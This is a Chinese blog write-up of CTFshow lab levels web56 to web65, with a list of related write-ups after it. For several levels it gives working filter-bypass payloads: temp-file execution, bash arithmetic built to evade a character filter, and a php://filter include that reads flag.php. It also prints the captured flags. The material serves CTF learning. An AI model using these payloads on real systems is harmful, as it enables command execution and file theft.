CTFshow web56 57 58 59 60-65

最新推荐文章于 2025-03-01 15:53:10 发布
最新推荐文章于 2025-03-01 15:53:10 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: CTF 渗透测试 命令执行 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127823831
版权

web56

代码分析:

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }

这块跟55类似,但是把数字也过滤了,意思是,/???/????64 不能用了,因为这里是靠64匹配的,数字没了所以就用不了了,但是.还是没过滤,可以使用.执行

payload:

详细介绍在前面的文章中——传送门

使用上传网页,上传个txt,抓包修改,发送到重发器,因为最后一位不一定为大写字母所以多发几次就有结果

 

flag:

ctfshow{1aca122d-266a-42a3-ab31-7ba3800c2277}

web57

代码分析:

//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{

提示了flag在36.php,下面甚至cat 和.php都给了,其实就是想办法构造36出来,看了大佬的解,发现在linux中$(())表示运算符计算,且默认相加 默认相加很重要的,然后~是取反的意思

尝试了一下 $(())=0,$((~ $(())))=-1 ,$((~ 36))=-37

 

$((~ -37))=36,所以就要构造一个 $((~ -37)),而刚刚提到$(())默认相加,尝试一下

$(($((~ $(()))) $((~ $(()))) $((~ $(())))))

所以写37个 $((~ $(()))) 就能得到-37 再用~取反 得到36

 

payload:

$((~ $(($((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(())))$((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) $((~ $(()))) ))))

ps:flag在F12中

flag:

ctfshow{d0d4cca2-b564-4c68-81bc-db28481f7249}

web58

代码分析:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{

变成post方法传参了,直接掏出hackbar

试了一下c=system('ls');

 出于安全性考虑已被禁用,passthru、shell_exec、exec都被禁用了,考虑文件包含或者highlight_file

payload:

c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

c=highlight_file("flag.php");

base64 falg: 

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNyAxOTo0MDo1Mw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDcgMTk6NDE6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s3Yjg3ODk5NS1jMGU5LTRiMWEtODljMC0zZTg1NTc2YmQ5ZjN9Ijs= 

 

 解法二

flag:

 ctfshow{7b878995-c0e9-4b1a-89c0-3e85576bd9f3}

web59

代码分析:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);

跟上一关一样

payload:

c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

c=highlight_file("flag.php");

flag:

ctfshow{f3be9bd8-55e2-4a59-9973-70ae3ddb8074}

web60

代码分析:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

 跟上一关一样

payload:

c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

c=highlight_file("flag.php");

flag:

ctfshow{41197111-be3c-4c5a-89d3-378cc8e8a003}

web61-65

都和前面一样

CTFshow 命令执行 web58
Kradress的博客
12-03 642
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
CTFshow 命令执行 web56
Kradress的博客
12-07 1058
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET[
CTFshow web入门---web56
qq_53099119的博客
11-13 1684
无字母数字RCE总结:https://yosheep.github.io/posts/6157ec5d.html (2025年1月23日更新)
ctfshow-web-61-77
2402_86944075的博客
03-01 709
exit(0);发现flag不在flag.php里,c=var_dump(scandir('.'));flag应该就是在flag.txt里,c=highlight_file('/flag.txt');这次在flagx.txt里,c=include("/flagx.txt");与前面几题一样同样可以用c=show_source('flag.php');没有,然后c=var_dump(scandir('/'));
ctfshow-web入门56(再次理解无数字字母rce)
qq_44657899的博客
10-18 1992
前言 之前做过一道红包题第二弹,这里也是同样的解法,但是新学到了很多知识点,记录一下。 这个解法,p神的文章讲的很清楚无字母数字webshell之提高篇 文章目录前言glob通配符. 执行文件不需要x权限题解 glob通配符 因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。 原理: 翻开ascii码表,可见大写字母位于@与[之间: 那么,我们可以利用[@-[]来表示大写字母: . 执行文件不需要x权限 题解 注意传参方式为POST。
CTFshow web入门 56
li_n_k的博客
11-15 544
零基础小白
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 961
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 553
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
ctfshow_web56-66_命令执行
Takagiapa的博客
11-17 714
对接上文,继续命令执行,会把知识点标著,学习并记录。
ctfshow 命令执行 web 29~124
shinygod的博客
02-22 528
原理:因为localeconv()的第个元素是“.”,然后pos()能够提取出当前元素的值,也就是“.”,而scandir()能过返回指定目录中的文件和目录的数组,然而上一层pos()已经提取出".“,这样就变成scandir(”.")返回当前目录下的目录数组,array_reverse()以相反的元素顺序返回数组,next()提取第二个元素,最后用read_file()、highlight_file()和show_source()读出源码。//若成功,则返回一个数组,若失败,则返回 false。
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 2132
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 932
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
无字母数字rce(ctfshow web入门56)
L1ni01
11-01 4007
无字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤
ctfshow-web入门55和56
m0_73303597的博客
01-01 452
自用
ctfshow-web入门-命令执行(web56web57web58
Welcome To Myon'Blog !
06-29 1706
由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37。命令执行,需要严格的过滤,已测试,可绕。
无字母数字的命令执行(ctfshow web入门 56
Firebasky的博客
09-12 3293
前面的一篇文章和这道题一样的做法 无字母数字的命令执行(ctfshow web入门 55) 需要注意的是:每次上传的文件不一定有大写的文件名,需要多上传几次
ctfshow web入门命令执行部分(更新至56
L1ni01
10-16 3744
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
ctfshow web入门55,56
xiaolong22333的博客
11-03 1695
最近在做这系列的题,这两题又学到了新姿势,赶紧记录一下 web55 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤了字母,不过通配符?和数字没有过滤,可以用bin
ctf.show web入门(命令执行)29~56
qq_61768489的博客
01-27 3212
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match()函数学习一下: preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0 在这个正则里边有一个参数是i,这个在正则
ctfshow web 56
最新发布
03-18
### 关于CTFShow Web 56的解题思路 对于CTFShow平台上的Web类第56题,虽然具体题目细节未提供,但从已知的信息可以推测该题目可能涉及文件读取漏洞或路径遍历等问题。以下是基于常见Web安全挑战的分析和解决方法: #### 文件读取与路径遍历 如果题目涉及到`readfile()`函数,则可能存在路径遍历漏洞。攻击者可以通过构造恶意输入来访问服务器上未经授权的文件。 例如,在PHP中,`readfile()`函数用于将整个文件读入字符串并输出到浏览器。如果没有对用户输入进行严格过滤,可能会导致敏感文件泄露。以下是一个典型的利用方式[^1]: ```php <?php $file = $_GET['file']; readfile($file); ?> ``` 通过向参数`file`传递类似于`../`的路径穿越字符,攻击者能够尝试访问任意文件。为了防止此类攻击,应该对用户提交的数据进行全面验证,并限制可访问的目录范围。 #### SQL Injection Union Query 另一个常见的问题是SQL注入中的Union查询技术。当应用程序未能正确转义特殊字符时,就可能发生这种情况。下面展示了一个基本的例子[^2]: 假设存在如下查询语句: ```sql SELECT name, password FROM users WHERE id = '$_GET[id]'; ``` 如果允许直接拼接未经处理的外部数据作为部分SQL命令执行的话,那么黑客就可以轻松突破系统的防护机制获取数据库内的其他记录甚至控制权。 因此,在开发过程中要特别注意采用预编译语句或者ORM框架等方式减少手工构建动态SQL的机会;同时也要记得设置最小权限原则给运行环境下的DB账户只授予必要的操作许可以降低潜在风险影响面。 #### 综合考虑程序逻辑错误修复方案建议 除了上述提到的技术层面之外还需要关注整体业务流程设计是否存在缺陷。比如某些情况下看似无害的功能组合起来却能造成严重后果(如前面说过的上传功能加解析漏洞),这就要求我们在做需求评审阶段就要充分考虑到各种边界条件以及异常情况如何妥善处置而不至于让系统暴露在外网之下成为被轻易攻破的目标对象之一[^3]. 最后提醒大家参加这类竞赛活动期间一定要遵守主办方制定的相关规定不要做出任何违反道德伦理的事情损害他人利益同时也保护好自己个人信息安全! ```python import re def secure_read_file(file_path): allowed_pattern = r'^[a-zA-Z0-9_-]+\.(txt|log)$' # 只允许特定扩展名的安全文件名模式匹配 if not re.match(allowed_pattern, file_path): # 如果不符合正则表达式的定义格式则抛出异常终止后续动作 raise ValueError("Invalid filename provided.") with open(file_path, 'r') as f: # 安全地打开指定路径下的文档资源内容返回给调用方使用 return f.read() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值